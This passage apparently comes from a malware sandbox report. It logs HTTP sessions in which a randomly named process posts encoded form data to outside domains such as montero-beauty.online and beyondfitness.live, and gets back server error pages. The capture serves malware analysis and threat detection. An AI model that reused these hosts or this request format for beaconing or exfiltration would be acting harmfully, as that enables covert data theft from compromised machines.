                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:53:36.178807020 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:36 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66df0ead-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.550024185.104.45.157804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:41.274173975 CET804OUTPOST /iwr0/ HTTP/1.1
                                                                                      Host: www.montero-beauty.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.montero-beauty.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.montero-beauty.online/iwr0/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 54 37 55 53 6e 30 58 68 79 6f 4c 32 50 6f 6c 4b 45 32 39 6b 6d 38 6b 43 74 50 35 62 64 49 64 38 39 34 42 58 44 45 34 56 55 6a 2f 66 32 45 53 47 5a 2f 41 52 36 63 51 51 38 4a 73 74 6c 4f 4a 50 38 70 54 71 52 47 72 33 47 57 6f 38 48 36 50 50 45 66 58 52 73 37 79 50 31 43 70 63 66 30 4d 41 67 68 4f 75 50 5a 65 56 5a 54 66 65 36 42 50 4d 6c 4e 49 52 58 76 73 34 75 62 4d 61 51 4b 39 76 2b 4d 76 35 77 65 65 35 50 43 36 64 2f 45 47 77 73 65 56 37 44 71 45 6d 30 53 38 37 31 56 6a 51 6a 35 52 56 51 4e 2f 36 44 72 4e 36 51 78 62 59 49 38 51 4f 49 59 2b 48 63 61 4e 76 4a 32 53 75 41 68 58 41 35 31 55 3d
                                                                                      Data Ascii: bbg=T7USn0XhyoL2PolKE29km8kCtP5bdId894BXDE4VUj/f2ESGZ/AR6cQQ8JstlOJP8pTqRGr3GWo8H6PPEfXRs7yP1Cpcf0MAghOuPZeVZTfe6BPMlNIRXvs4ubMaQK9v+Mv5wee5PC6d/EGwseV7DqEm0S871VjQj5RVQN/6DrN6QxbYI8QOIY+HcaNvJ2SuAhXA51U=
                                                                                      Jan 10, 2025 19:53:41.983722925 CET737INHTTP/1.1 405 Not Allowed
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:41 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-ray: p13015:0.000
                                                                                      Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                      Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.550025185.104.45.157804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:43.828263044 CET824OUTPOST /iwr0/ HTTP/1.1
                                                                                      Host: www.montero-beauty.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.montero-beauty.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.montero-beauty.online/iwr0/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 54 37 55 53 6e 30 58 68 79 6f 4c 32 50 4e 31 4b 47 57 42 6b 6b 63 6b 42 78 66 35 62 57 6f 64 34 39 34 4e 58 44 41 67 46 55 77 62 66 33 6b 43 47 59 39 6f 52 35 63 51 51 33 70 73 6f 34 65 49 42 38 70 65 41 52 45 2f 33 47 57 38 38 48 2f 4c 50 45 6f 44 57 74 72 79 4e 73 53 70 65 43 6b 4d 41 67 68 4f 75 50 5a 61 2f 5a 54 48 65 36 78 66 4d 6c 76 77 51 4c 66 73 35 34 4c 4d 61 55 4b 39 72 2b 4d 75 65 77 61 57 54 50 42 43 64 2f 47 75 77 73 50 56 34 4a 71 45 6b 73 79 39 6f 77 6e 43 39 6d 59 70 34 52 65 7a 79 64 64 4e 7a 63 6e 71 79 53 65 59 6d 62 34 53 2f 4d 4a 46 59 59 47 7a 48 61 43 48 77 6e 69 42 74 2b 53 70 36 58 46 42 56 70 37 39 72 74 53 58 55 7a 33 4a 41
                                                                                      Data Ascii: bbg=T7USn0XhyoL2PN1KGWBkkckBxf5bWod494NXDAgFUwbf3kCGY9oR5cQQ3pso4eIB8peARE/3GW88H/LPEoDWtryNsSpeCkMAghOuPZa/ZTHe6xfMlvwQLfs54LMaUK9r+MuewaWTPBCd/GuwsPV4JqEksy9ownC9mYp4RezyddNzcnqySeYmb4S/MJFYYGzHaCHwniBt+Sp6XFBVp79rtSXUz3JA
                                                                                      Jan 10, 2025 19:53:44.516108990 CET737INHTTP/1.1 405 Not Allowed
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:44 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-ray: p13015:0.000
                                                                                      Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                      Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.550026185.104.45.157804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:46.375705004 CET1841OUTPOST /iwr0/ HTTP/1.1
                                                                                      Host: www.montero-beauty.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.montero-beauty.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.montero-beauty.online/iwr0/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 54 37 55 53 6e 30 58 68 79 6f 4c 32 50 4e 31 4b 47 57 42 6b 6b 63 6b 42 78 66 35 62 57 6f 64 34 39 34 4e 58 44 41 67 46 55 77 54 66 32 58 61 47 5a 63 6f 52 34 63 51 51 36 4a 73 70 34 65 4a 64 38 70 57 62 52 45 44 6e 47 56 45 38 42 5a 33 50 47 61 37 57 6e 72 79 4e 6a 79 70 64 66 30 4d 76 67 6c 69 71 50 5a 4b 2f 5a 54 48 65 36 30 54 4d 73 64 49 51 59 50 73 34 75 62 4d 47 51 4b 39 54 2b 4d 48 68 77 61 61 70 4d 78 69 64 2f 6d 2b 77 68 64 39 34 4c 4b 45 69 76 79 38 76 77 6e 4f 2b 6d 5a 46 43 52 66 32 70 64 61 42 7a 59 79 66 77 43 50 49 70 41 61 65 68 44 4b 64 59 59 53 2f 5a 58 51 33 49 36 56 78 59 38 6a 35 7a 59 51 46 77 76 61 56 6d 2b 6d 7a 33 35 54 74 49 58 34 58 36 78 6b 4f 52 31 45 64 6e 30 2b 63 70 57 58 72 44 44 61 4d 70 62 79 55 4d 45 47 79 32 56 42 54 33 55 59 35 51 41 66 44 6e 35 67 4c 4a 4b 41 37 58 41 62 47 6d 4d 74 4b 37 4e 42 38 52 62 69 55 65 6d 34 33 2f 50 4f 69 39 79 62 46 44 72 32 6f 79 4b 71 53 43 67 70 75 4f 6e 44 37 78 53 39 43 32 41 32 66 59 77 57 36 65 79 69 78 45 71 4c [TRUNCATED]
                                                                                      Data Ascii: bbg=T7USn0XhyoL2PN1KGWBkkckBxf5bWod494NXDAgFUwTf2XaGZcoR4cQQ6Jsp4eJd8pWbREDnGVE8BZ3PGa7WnryNjypdf0MvgliqPZK/ZTHe60TMsdIQYPs4ubMGQK9T+MHhwaapMxid/m+whd94LKEivy8vwnO+mZFCRf2pdaBzYyfwCPIpAaehDKdYYS/ZXQ3I6VxY8j5zYQFwvaVm+mz35TtIX4X6xkOR1Edn0+cpWXrDDaMpbyUMEGy2VBT3UY5QAfDn5gLJKA7XAbGmMtK7NB8RbiUem43/POi9ybFDr2oyKqSCgpuOnD7xS9C2A2fYwW6eyixEqLCvX//cDW1E2IhC1Y9woAQKGZM+3rldc0xk/dpyfb3fY9dN08QtZowENduLrv3GwjG12sAcUAVJhG5XEb1BtL+WZZkq7mqaS5IALNx4nfRL8ve30hSHzEnlJI2Bm386Rfgf1cH2ZWvrX6KSCZXB+WCg9WT/YZolKOM+1lmTJtZ93qch/2EalORG5s9BoSfw0TnYcqqeNKO7BQYcC0McgRWDdP1mDPYYf8KT+Um0VJ+iaS/Chg5puKZN2hUr3YaN0DqKzIC7i11wcEBhQPmLvAFGtAjMbVdN6fkxpyKz1VsacqN3WwyFGLxMemcTRlHuPckr1D/WmrdWL34LOAI17DHYUa5DxnPIDyt1UUJ6HXOD7ulH3w262FR6Se+yFStdz65SDXz6OwzJBRv+BQh+CXfqRLjivgxbHnk290stKJI4Jh5f+uazeXvJ3WBy2k05tlfbs1qtEeF5hF84ftXlsLc9IbaFVMQclws7FJ8ZUkI4Bb806IQIHBPkdayEqwZrMu/kbN/14jEAnv3X40WIn+TzD1YP5+J3AKRb7yw24AjAYvOpRvidTLbbomFXWWPhhs2vOrM+mNMkZaJexHuGGqH2oL/EWPMdK1rfha00lpHzkTSsYNjuZCGjmP958xTTXA2gryE8blF/0ayJytfFrzlNxxBWP2PtCNoX [TRUNCATED]
                                                                                      Jan 10, 2025 19:53:47.075572968 CET737INHTTP/1.1 405 Not Allowed
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:46 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-ray: p13015:0.000
                                                                                      Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                      Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      29192.168.2.550027185.104.45.157804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:49.840758085 CET532OUTGET /iwr0/?bbg=e58ykDXR7JLcMoNRWEYHn8cc5Pgwf9t/kt1uMD4eNiXxy32DdM8h+aEO1Z89nPF0w4/1A2XEUA4gZargWKfwgcGRrE4dAF8MmhPgLvSHdRT95UfShtNaVZFD9IYeOb8YiA==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.montero-beauty.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:53:50.554249048 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:50 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-ray: p13015:0.000
                                                                                      Data Raw: 31 34 61 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 [TRUNCATED]
                                                                                      Data Ascii: 14ad<!doctype html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'><TITLE>Website www.montero-beauty.online not configured</TITLE><style type="text/css"> * { box-sizing: border-box; margin: 0; padding: 0; font-family: 'Open Sans', sans-serif; } body { background-color: #f1f4f5;; } .content { margin-top: 30vh; width: 100%; height: 100vh; display: flex; align-items: center; flex-direction: column; gap: 1.5em; color: #3b3a3a } .content a { color: [TRUNCATED]
                                                                                      Jan 10, 2025 19:53:50.554301023 CET224INData Raw: 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 35 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                      Data Ascii: width: 50%; } @media screen and (max-width: 750px) { .content > * { width: 85%; } }</style></head><body><div class="content"><div class="header"><
                                                                                      Jan 10, 2025 19:53:50.554337978 CET1236INData Raw: 68 32 3e 0a 09 09 09 57 65 62 73 69 74 65 20 77 77 77 2e 6d 6f 6e 74 65 72 6f 2d 62 65 61 75 74 79 2e 6f 6e 6c 69 6e 65 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 d0 b2 0a 09 09 3c 2f 68 32 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 09 3c 64 69 76 20 63 6c
                                                                                      Data Ascii: h2>Website www.montero-beauty.online not configure</h2></div><div class="comment">Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15
                                                                                      Jan 10, 2025 19:53:50.554373980 CET1236INData Raw: 09 09 7d 2c 0a 09 09 27 64 65 27 3a 20 7b 0a 09 09 09 27 74 69 74 6c 65 27 3a 20 27 57 65 62 73 69 74 65 20 77 77 77 2e 6d 6f 6e 74 65 72 6f 2d 62 65 61 75 74 79 2e 6f 6e 6c 69 6e 65 20 6e 69 63 68 74 20 6b 6f 6e 66 69 67 75 72 69 65 72 74 27 2c
                                                                                      Data Ascii: },'de': {'title': 'Website www.montero-beauty.online nicht konfiguriert','h2': 'Website www.montero-beauty.online nicht konfiguriert','.comment': 'Domainadressendatensatz verweist auf unseren Server, aber diese Site wird nicht
                                                                                      Jan 10, 2025 19:53:50.554409027 CET1236INData Raw: 72 3e e5 a6 82 e6 9e 9c e6 82 a8 e6 9c 80 e8 bf 91 e5 9c a8 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf e4 b8 ad e6 b7 bb e5 8a a0 e4 ba 86 e7 ab 99 e7 82 b9 20 2d 20 e7 ad 89 e5 be 85 20 31 35 20 e5 88 86 e9 92 9f ef bc 8c e6 82 a8 e7 9a 84 e7 ab 99 e7
                                                                                      Data Ascii: r> - 15 ','.link': '',},'ru': {'title': ' www.montero-beauty.online ',
                                                                                      Jan 10, 2025 19:53:50.554449081 CET309INData Raw: 7d 0a 0a 09 09 69 66 28 5b 27 72 75 27 2c 20 27 75 6b 27 5d 2e 69 6e 63 6c 75 64 65 73 28 6c 61 6e 67 29 29 20 7b 0a 09 09 09 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 2e 6c 69 6e 6b 27 29 2e 68 72 65 66 20 3d 20 60
                                                                                      Data Ascii: }if(['ru', 'uk'].includes(lang)) {document.querySelector('.link').href = `https://www.ukraine.com.ua/${lang}/wiki/hosting/errors/site-not-served/`} else {document.querySelector('.link').href = `https://hosting.xyz/wiki/hosting/e


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.550028209.74.77.107804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:55.756453037 CET795OUTPOST /2eo9/ HTTP/1.1
                                                                                      Host: www.beyondfitness.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.beyondfitness.live
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.beyondfitness.live/2eo9/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 32 56 4f 54 62 74 6f 72 35 39 61 68 43 64 44 37 44 77 52 75 76 72 32 6a 37 7a 4d 55 52 32 74 50 6c 72 75 7a 37 71 4d 66 38 6d 34 31 59 57 2f 62 55 51 70 76 65 58 30 36 51 44 68 7a 62 38 62 69 56 73 4c 2b 72 2b 59 41 4c 50 32 32 4b 32 73 43 62 43 53 34 6d 33 37 38 6c 72 79 36 64 30 6f 77 45 4d 70 45 78 55 6c 39 43 36 58 41 7a 31 2f 78 35 42 42 4d 64 45 7a 61 68 59 4e 48 74 57 74 50 4c 53 43 74 4a 46 50 74 38 33 4a 49 31 57 70 53 54 42 70 58 52 71 45 53 44 71 37 52 51 47 58 51 5a 74 72 31 66 61 42 4e 33 74 45 75 34 43 47 65 52 69 77 42 76 32 35 2f 63 73 43 58 72 63 68 66 78 38 46 4d 34 58 51 3d
                                                                                      Data Ascii: bbg=2VOTbtor59ahCdD7DwRuvr2j7zMUR2tPlruz7qMf8m41YW/bUQpveX06QDhzb8biVsL+r+YALP22K2sCbCS4m378lry6d0owEMpExUl9C6XAz1/x5BBMdEzahYNHtWtPLSCtJFPt83JI1WpSTBpXRqESDq7RQGXQZtr1faBN3tEu4CGeRiwBv25/csCXrchfx8FM4XQ=
                                                                                      Jan 10, 2025 19:53:57.192677975 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 10 Jan 2025 18:53:56 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
